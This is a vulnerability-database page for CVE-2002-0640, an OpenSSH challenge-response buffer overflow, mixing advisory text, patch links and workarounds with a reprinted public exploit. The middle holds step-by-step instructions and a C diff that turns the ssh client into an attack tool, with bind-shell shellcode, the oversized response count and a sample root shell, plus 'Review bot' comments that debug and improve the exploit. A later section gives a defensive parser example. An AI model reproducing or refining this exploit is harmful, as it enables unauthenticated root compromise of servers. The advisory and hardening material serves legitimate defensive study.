CVE-2002-0640
CVSS 10.0
Published: 2002-07-03 00:00:00
Revised: 2016-10-17 22:20:57

[Original] Buffer overflow in sshd in OpenSSH 2.3.1 through 3.3 may allow remote attackers to execute arbitrary code via a large number of responses during challenge response authentication when OpenBSD is using PAM modules with interactive keyboard authentication (PAMAuthenticationViaKbdInt).


[CNNVD] OpenSSH Challenge-Response Keyboard-Interactive PAM Authentication Remote Buffer Overflow Vulnerability (CNNVD-200207-029)

        
        OpenSSH is an open-source implementation of the SSH protocol. It was first written for OpenBSD and has since been ported to many Unix/Linux-like operating systems.
        The challenge-response handling code in OpenSSH 2.3.1p1 through 3.3 contains a flaw that lets a remote attacker execute arbitrary commands with the privileges of the sshd process (normally root).
        The flaw is a buffer overflow in the handling of the responses received during the challenge-response authentication phase. Regardless of whether the challenge-response authentication option is configured, a system that uses PAM modules through keyboard-interactive PAM authentication (PAMAuthenticationViaKbdInt) is affected, and a remote attacker can exploit it to run arbitrary commands with the privileges of the sshd process.
        

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:openbsd:openssh:3.0p1    OpenBSD OpenSSH 3.0 p1
cpe:/a:openbsd:openssh:3.1p1    OpenBSD OpenSSH 3.1 p1
cpe:/a:openbsd:openssh:3.0.1    OpenBSD OpenSSH 3.0.1
cpe:/a:openbsd:openssh:2.5.2    OpenBSD OpenSSH 2.5.2
cpe:/a:openbsd:openssh:3.0.1p1  OpenBSD OpenSSH 3.0.1 p1
cpe:/a:openbsd:openssh:2.9p1    OpenBSD OpenSSH 2.9 p1
cpe:/a:openbsd:openssh:2.9p2    OpenBSD OpenSSH 2.9 p2
cpe:/a:openbsd:openssh:2.5.1    OpenBSD OpenSSH 2.5.1
cpe:/a:openbsd:openssh:1.2.2    OpenBSD OpenSSH 1.2.2
cpe:/a:openbsd:openssh:2.9      OpenBSD OpenSSH 2.9
cpe:/a:openbsd:openssh:2.5      OpenBSD OpenSSH 2.5
cpe:/a:openbsd:openssh:2.1      OpenBSD OpenSSH 2.1
cpe:/a:openbsd:openssh:3.0      OpenBSD OpenSSH 3.0
cpe:/a:openbsd:openssh:3.3      OpenBSD OpenSSH 3.3
cpe:/a:openbsd:openssh:2.2      OpenBSD OpenSSH 2.2
cpe:/a:openbsd:openssh:2.9.9    OpenBSD OpenSSH 2.9.9
cpe:/a:openbsd:openssh:3.1      OpenBSD OpenSSH 3.1
cpe:/a:openbsd:openssh:2.3      OpenBSD OpenSSH 2.3
cpe:/a:openbsd:openssh:3.2      OpenBSD OpenSSH 3.2
cpe:/a:openbsd:openssh:1.2.3    OpenBSD OpenSSH 1.2.3
cpe:/a:openbsd:openssh:3.2.3p1  OpenBSD OpenSSH 3.2.3 p1
cpe:/a:openbsd:openssh:3.2.2p1  OpenBSD OpenSSH 3.2.2 p1
cpe:/a:openbsd:openssh:2.1.1    OpenBSD OpenSSH 2.1.1
cpe:/a:openbsd:openssh:3.0.2p1  OpenBSD OpenSSH 3.0.2 p1
cpe:/a:openbsd:openssh:3.0.2    OpenBSD OpenSSH 3.0.2
cpe:/a:openbsd:openssh:3.3p1    OpenBSD OpenSSH 3.3 p1

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0640
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0640
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-029
(official data source) CNNVD

- Other links and resources

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-030.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-030.0
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000502
(UNKNOWN)  CONECTIVA  CLA-2002:502
http://marc.info/?l=bugtraq&m=102514371522793&w=2
(UNKNOWN)  BUGTRAQ  20020626 OpenSSH Security Advisory (adv.iss)
http://marc.info/?l=bugtraq&m=102514631524575&w=2
(UNKNOWN)  BUGTRAQ  20020626 Revised OpenSSH Security Advisory (adv.iss)
http://marc.info/?l=bugtraq&m=102521542826833&w=2
(UNKNOWN)  BUGTRAQ  20020627 How to reproduce OpenSSH Overflow.
http://marc.info/?l=bugtraq&m=102532054613894&w=2
(UNKNOWN)  BUGTRAQ  20020628 Sun statement on the OpenSSH Remote Challenge Vulnerability
http://www.cert.org/advisories/CA-2002-18.html
(UNKNOWN)  CERT  CA-2002-18
http://www.debian.org/security/2002/dsa-134
(UNKNOWN)  DEBIAN  DSA-134
http://www.kb.cert.org/vuls/id/369347
(UNKNOWN)  CERT-VN  VU#369347
http://www.linuxsecurity.com/advisories/other_advisory-2177.html
(UNKNOWN)  ENGARDE  ESA-20020702-016
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2002:040
(UNKNOWN)  MANDRAKE  MDKSA-2002:040
http://www.novell.com/linux/security/advisories/2002_024_openssh_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2002:024
http://www.redhat.com/support/errata/RHSA-2002-127.html
(UNKNOWN)  REDHAT  RHSA-2002:127
http://www.redhat.com/support/errata/RHSA-2002-131.html
(UNKNOWN)  REDHAT  RHSA-2002:131
http://www.securityfocus.com/bid/5093
(UNKNOWN)  BID  5093
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0206-195
(UNKNOWN)  HP  HPSBUX0206-195

- Vulnerability information

OpenSSH Challenge-Response Keyboard-Interactive PAM Authentication Remote Buffer Overflow Vulnerability
Critical   Boundary condition error
2002-07-03 00:00:00 2006-03-28 00:00:00
Remote
        
        

- Advisories and patches

        Temporary workarounds:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the exposure:
        * 1) Disable SSH protocol version 2:
        Both vulnerabilities exist only in SSH protocol version 2, so disabling protocol 2 prevents them from being exploited. Edit /etc/ssh/sshd_config so that it reads:
        Protocol 1
        (This forces clients onto the older SSH-1 protocol and is not recommended as anything more than a stopgap.)
        * 2) Disable challenge-response authentication:
        In OpenSSH 2.9 and later, the administrator can set "ChallengeResponseAuthentication" to "no" in the sshd configuration file, i.e. the following line in /etc/ssh/sshd_config:
        ChallengeResponseAuthentication no
        This prevents exploitation when S/Key or BSD_AUTH authentication is in use, but it does not prevent the variant reached through keyboard-interactive PAM authentication (PAMAuthenticationViaKbdInt).
        * 3) Disable keyboard-interactive PAM authentication:
        In OpenSSH 2.9 and later, the administrator can set "PAMAuthenticationViaKbdInt" to "no" in the sshd configuration file, i.e. the following line in /etc/ssh/sshd_config:
        PAMAuthenticationViaKbdInt no
        This option defaults to "no". It prevents exploitation through keyboard-interactive PAM authentication, but it does not prevent the variant reached through S/Key or BSD_AUTH authentication.
        * 4) Disable both options in older OpenSSH versions:
        In OpenSSH versions between 2.3.1p1 and 2.9, the administrator can set the following options to prevent both vulnerabilities from being exploited:
        KbdInteractiveAuthentication no
        ChallengeResponseAuthentication no
        * 5) Use privilege separation to limit the impact:
        OpenSSH 3.2 and 3.3 support privilege separation through the "UsePrivilegeSeparation" option, enabled by adding the following line to /etc/ssh/sshd_config:
        UsePrivilegeSeparation yes
        This does not stop the vulnerability from being exploited. Because of privilege separation, however, an attacker who successfully exploits either vulnerability and obtains a shell is confined to an unprivileged, chroot-restricted process rather than running as root. It also does not prevent denial of service. Administrators are advised to upgrade or apply the vendor patch.
        Vendor patches:
        Caldera
        -------
        Caldera has released a security advisory (CSSA-2002-030.0) for this issue:
        CSSA-2002-030.0: Linux: OpenSSH Vulnerabilities in Challenge Response Handling
        Link:
        http://www.caldera.com/support/security/advisories/CSSA-2002-030.0.txt

        Conectiva
        ---------
        Conectiva has released a security advisory (CLA-2002:502) and corresponding patches:
        CLA-2002:502: openssh
        Link:
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000502

        Patch downloads:
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/openssh-3.4p1-1U60_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-3.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-askpass-3.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-askpass-gnome-3.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-clients-3.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-server-3.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/openssh-3.4p1-1U70_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-3.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-askpass-3.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-askpass-gnome-3.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-clients-3.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-server-3.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/openssh-3.4p1-1U8_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-3.4p1-1U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-askpass-3.4p1-1U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-askpass-gnome-3.4p1-1U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-clients-3.4p1-1U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-server-3.4p1-1U8_1cl.i386.rpm
        Users of Conectiva Linux 6.0 and later can update the RPM packages with apt:
        - Add the following line to /etc/apt/sources.list:
        
        rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates
        (if you are not running 6.0, replace the 6.0 above with the appropriate version number)
        - Run: apt-get update
        - After the update completes, run: apt-get upgrade
        Debian
        ------
        Debian has released a security advisory (DSA-134-4) and corresponding patches:
        DSA-134-4: OpenSSH Remote Challenge Vulnerability
        Link:
        http://www.debian.org/security/2002/dsa-134

        Patch downloads:
        Source archives:
        http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1.orig.tar.gz
          Size/MD5 checksum: 837668 459c1d0262e939d6432f193c7a4ba8a8
        http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1-0.0potato1.dsc
          Size/MD5 checksum: 871 dd0f18d576520cb7110f5791bce67708
        http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1-0.0potato1.diff.gz
          Size/MD5 checksum: 33706 ff798880b0835dcc77e42a2b9a075148
        http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c.orig.tar.gz
          Size/MD5 checksum: 2153980 c8261d93317635d56df55650c6aeb3dc
        http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1.diff.gz
          Size/MD5 checksum: 37925 718ffc86669ae06b22d77c659400f4e8
        http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1.dsc
          Size/MD5 checksum: 784 b197de235e0d10f7bb66b4751808a033
        Architecture independent packages:
        http://security.debian.org/pool/updates/main/o/openssl/ssleay_0.9.6c-0.potato.1_all.deb
          Size/MD5 checksum: 976 6b39f5a320b1c8bdbba05e2c8b041b70
        alpha architecture (DEC Alpha)
        

- Vulnerability information (21578)

OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1) (EDBID:21578)
unix remote
2002-06-24 Verified
0 Christophe Devine
source: http://www.securityfocus.com/bid/5093/info

The OpenSSH team has reported two vulnerabilities in OpenSSH that are remotely exploitable and may allow for unauthenticated attackers to obtain root privileges.

The conditions are related to the OpenSSH SSH2 challenge-response mechanism. They occur when the OpenSSH server is configured at compile time to support BSD_AUTH or SKEY. OpenBSD 3.0 and later ship with OpenSSH built to support BSD_AUTH. Systems are vulnerable when either of the following configuration options are enabled:

PAMAuthenticationViaKbdInt
ChallengeResponseAuthentication

Attackers can exploit the vulnerabilities by crafting a malicious response. Since this occurs before the authentication process completes, remote attackers without valid credentials may exploit this. Successful exploits may result in the execution of shellcode or a denial of service.

OpenSSH 3.4 addresses the problem. Upgrading to this version will eliminate the vulnerabilities. Administrators who cannot install OpenSSH 3.4 should upgrade to version 3.3 and enable the privilege-separation feature.

Proof-of-concept code has been made public. Users are advised to upgrade immediately.

**UPDATE: One of these issues is trivially exploitable and is still present in OpenSSH 3.5p1 and 3.4p1. Although these reports have not been confirmed, administrators are advised to implement the OpenSSH privilege-separation feature as a workaround. BSD administrators are also advised to upgrade to the newest kernel versions because recently patched vulnerabilities may allow root compromise despite the use of the privilege-separation feature. 

1. Download openssh-3.2.2p1.tar.gz and untar it

~ $ tar -xvzf openssh-3.2.2p1.tar.gz

2. Apply the patch provided below by running:

~/openssh-3.2.2p1 $ patch < path_to_diff_file

3. Compile the patched client

~/openssh-3.2.2p1 $ ./configure && make ssh

4. Run the evil ssh:

~/openssh-3.2.2p1 $ ./ssh root:skey@localhost

5. If the sploit worked, you can connect to port 128 in another terminal:

~ $ nc localhost 128
uname -a
OpenBSD nice 3.1 GENERIC#59 i386
id
uid=0(root) gid=0(wheel) groups=0(wheel)

--- sshconnect2.c	Sun Mar 31 20:49:39 2002
+++ evil-sshconnect2.c	Fri Jun 28 19:22:12 2002
@@ -839,6 +839,56 @@
 /*
  * parse INFO_REQUEST, prompt user and send INFO_RESPONSE
  */
+
+int do_syscall( int nb_args, int syscall_num, ... );
+
+void shellcode( void )
+{
+    int server_sock, client_sock, len;
+    struct sockaddr_in server_addr;
+    char rootshell[12], *argv[2], *envp[1];
+
+    server_sock = do_syscall( 3, 97, AF_INET, SOCK_STREAM, 0 );
+    server_addr.sin_addr.s_addr = 0;
+    server_addr.sin_port = 32768;
+    server_addr.sin_family = AF_INET;
+    do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr, 
16 );
+    do_syscall( 2, 106, server_sock, 1 );
+    client_sock = do_syscall( 3, 30, server_sock, (struct sockaddr *)
+	&server_addr, &len );
+    do_syscall( 2, 90, client_sock, 0 );
+    do_syscall( 2, 90, client_sock, 1 );
+    do_syscall( 2, 90, client_sock, 2 );
+    * (int *) ( rootshell + 0 ) = 0x6E69622F;
+    * (int *) ( rootshell + 4 ) = 0x0068732f;
+    * (int *) ( rootshell + 8 ) = 0;
+    argv[0] = rootshell;
+    argv[1] = 0;
+    envp[0] = 0;
+    do_syscall( 3, 59, rootshell, argv, envp );
+}
+
+int do_syscall( int nb_args, int syscall_num, ... )
+{
+    int ret;
+    asm(
+	"mov	8(%ebp), %eax; "
+	"add	$3,%eax; "
+	"shl	$2,%eax; "
+	"add	%ebp,%eax; "
+	"mov	8(%ebp), %ecx; "
+	"push_args: "
+	"push	(%eax); "
+	"sub	$4, %eax; "
+	"loop	push_args; "
+	"mov	12(%ebp), %eax; "
+	"push	$0; "
+	"int	$0x80; "
+	"mov	%eax,-4(%ebp)"
+    );
+    return( ret );
+}
+
 void
 input_userauth_info_req(int type, u_int32_t seq, void *ctxt)
 {
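Review bot: the line `16 );` that follows `do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr, ` has lost its leading `+` to line wrapping, so `patch` will reject this hunk until the two lines are rejoined. Two values in shellcode() need a comment: `server_addr.sin_port = 32768;` stores 0x8000 without htons(), and on the little-endian i386 target the bytes reach the wire as 00 80, so the listener binds TCP port 128, which is why step 5 connects to port 128 rather than 32768; and `len` is passed to accept() uninitialised, so the address length the kernel sees is whatever happened to be on the stack. The syscall numbers (97 socket, 104 bind, 106 listen, 30 accept, 90 dup2, 59 execve) are OpenBSD/i386 numbers, matching the `OpenBSD nice 3.1` target shown in step 5, and assembling "/bin/sh" from the immediates 0x6E69622F and 0x0068732f keeps the function free of pointers into .rodata, which is what allows the raw bytes of shellcode() to be shipped as the payload. In do_syscall(), `ret` is never assigned in C: the asm writes %eax to -4(%ebp) on the assumption that the compiler placed `ret` in that slot, a frame-layout dependency that should at least be stated, or replaced by an output constraint such as `"=a"(ret)`.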
@@ -865,7 +915,7 @@
 	xfree(inst);
 	xfree(lang);
 
-	num_prompts = packet_get_int();
+	num_prompts = 1073741824 + 1024;
 	/*
 	 * Begin to build info response packet based on prompts requested.
 	 * We commit to providing the correct number of responses, so if
@@ -874,6 +924,13 @@
 	 */
 	packet_start(SSH2_MSG_USERAUTH_INFO_RESPONSE);
 	packet_put_int(num_prompts);
+
+	for( i = 0; i < 1045; i++ )
+	    packet_put_cstring( "xxxxxxxxxx" );
+
+	packet_put_string( shellcode, 2047 );
+	packet_send();
+	return;
 
 	debug2("input_userauth_info_req: num_prompts %d", num_prompts);
 	for (i = 0; i < num_prompts; i++) {
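Review bot: `packet_put_string( shellcode, 2047 )` ships 2047 raw bytes starting at the address of shellcode(), i.e. whatever the compiler emitted for shellcode() and for do_syscall() after it; this assumes the two functions are laid out back to back, contain no relocations, and fit in 2047 bytes, none of which the code checks, so a different compiler or optimisation level silently truncates or mangles the payload. Derive the length from the distance between the two function symbols, or at least state the assumption in a comment. The `return;` after packet_send() makes the original debug2() call and prompt loop unreachable, which is intended here, and `i` is the function's existing loop counter, so no new declaration is needed. The 1045 filler strings plus the shellcode string are 1046 responses against a claimed count of 2^30 + 1024, so whatever the server does when the packet runs dry happens after the out-of-bounds pointer writes the exploit depends on.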
		

- Vulnerability information (21579)

OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2) (EDBID:21579)
unix remote
2002-06-24 Verified
0 Gobbles Security
source: http://www.securityfocus.com/bid/5093/info
 

http://www.exploit-db.com/sploits/21579.tar.gz		

- Vulnerability information

839
OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

A remote overflow exists in OpenSSH when using PAM modules that use interactive keyboard authentication such as PAMAuthenticationViaKbdInt. OpenSSH fails to limit a buffer of the number of responses received in its challenge-response authentication code, resulting in a pre-authentication buffer overflow. With a specially crafted request, an attacker can cause the sshd daemon to execute arbitrary code on this host, resulting in a loss of confidentiality, integrity, and/or availability.
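The unlimited response count described above is, in arithmetic terms, the reason the public proof of concept higher on this page sets num_prompts to 1073741824 + 1024. The following is an added example, not OpenSSH's own code: it models, with 32-bit arithmetic as on the i386 targets of the time, the allocation a server would make from an unchecked count multiplied by sizeof(char *), and beside it a hardened parser for the SSH2_MSG_USERAUTH_INFO_RESPONSE body (a uint32 count followed by that many length-prefixed SSH strings) that rejects the count before any allocation happens. The function names, the constructed packets and the cap of 100 responses are assumptions made for this example; the upstream fix also rejects large counts with a small fixed limit, but the exact value is not on this page.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example, not OpenSSH code. Models the response-count handling of
 * SSH2_MSG_USERAUTH_INFO_RESPONSE on a 32-bit host. All names and the cap
 * below are assumptions made for the example.
 */

#define PTR32         4u    /* sizeof(char *) on the 32-bit target */
#define MAX_RESPONSES 100u  /* assumed cap; the real fix uses a small constant */

/* Size a 32-bit sshd would compute for the response-pointer array. */
uint32_t vulnerable_alloc_size(uint32_t nresp)
{
    return nresp * PTR32;   /* wraps modulo 2^32 once nresp >= 2^30 */
}

/* How many response pointers actually fit in that allocation. */
uint32_t pointers_that_fit(uint32_t nresp)
{
    return vulnerable_alloc_size(nresp) / PTR32;
}

static uint32_t get_u32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

static void put_u32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/*
 * Hardened parser: reject the count before it reaches any allocation and
 * check every string length against the bytes that remain.
 * Returns 0 on success, -1 for an oversized count, -2 for a string that
 * runs past the end of the body, -3 when the body holds fewer strings than
 * the count promised.
 */
int parse_info_response(const uint8_t *buf, size_t len, uint32_t *nresp_out)
{
    if (len < 4) return -2;
    uint32_t nresp = get_u32(buf);
    if (nresp > MAX_RESPONSES) return -1;
    size_t off = 4;
    for (uint32_t i = 0; i < nresp; i++) {
        if (len - off < 4) return -3;          /* no room for a length field */
        uint32_t slen = get_u32(buf + off);
        off += 4;
        if (slen > len - off) return -2;       /* string longer than what is left */
        off += slen;
    }
    if (nresp_out) *nresp_out = nresp;
    return 0;
}

/* Build a constructed INFO_RESPONSE body: claimed count, then the strings. */
size_t build_info_response(uint8_t *out, size_t cap, uint32_t claimed_count,
                           const char **strings, size_t nstrings)
{
    if (cap < 4) return 0;
    put_u32(out, claimed_count);
    size_t off = 4;
    for (size_t i = 0; i < nstrings; i++) {
        size_t slen = strlen(strings[i]);
        if (cap - off < 4 + slen) return 0;
        put_u32(out + off, (uint32_t)slen);
        memcpy(out + off + 4, strings[i], slen);
        off += 4 + slen;
    }
    return off;
}

int main(void)
{
    uint8_t pkt[256];
    const char *good[] = { "s3cret", "123456" };     /* constructed sample */
    const char *evil[] = { "xxxxxxxxxx" };           /* filler like the PoC's */
    uint32_t n = 0;

    size_t len = build_info_response(pkt, sizeof pkt, 2, good, 2);
    printf("honest client:    rc=%d nresp=%u\n", parse_info_response(pkt, len, &n), (unsigned)n);

    uint32_t poc_count = (1u << 30) + 1024;          /* the value from the public PoC */
    printf("count 2^30+1024:  alloc=%u bytes, fits %u pointers (PoC sends 1046 strings)\n",
           (unsigned)vulnerable_alloc_size(poc_count), (unsigned)pointers_that_fit(poc_count));
    len = build_info_response(pkt, sizeof pkt, poc_count, evil, 1);
    printf("hardened parser:  rc=%d\n", parse_info_response(pkt, len, &n));
    return 0;
}
```

Compile with `cc -std=c99` and run: the honest two-string packet parses, the proof-of-concept count is reported as a 4096-byte allocation holding 1024 pointers, and the hardened parser returns -1 for that count before any memory is touched. The order matters: the count check must come before the multiplication, because the multiplication is exactly where the information is lost.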

- Timeline

2002-06-26 Unknown
Unknown Unknown

- Solution

Upgrade to version 3.4 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by applying the vendor-supplied patch, or by disabling support for SSHv2 (not recommended).

- References

- Vulnerability author

Unknown or Incomplete
 

 
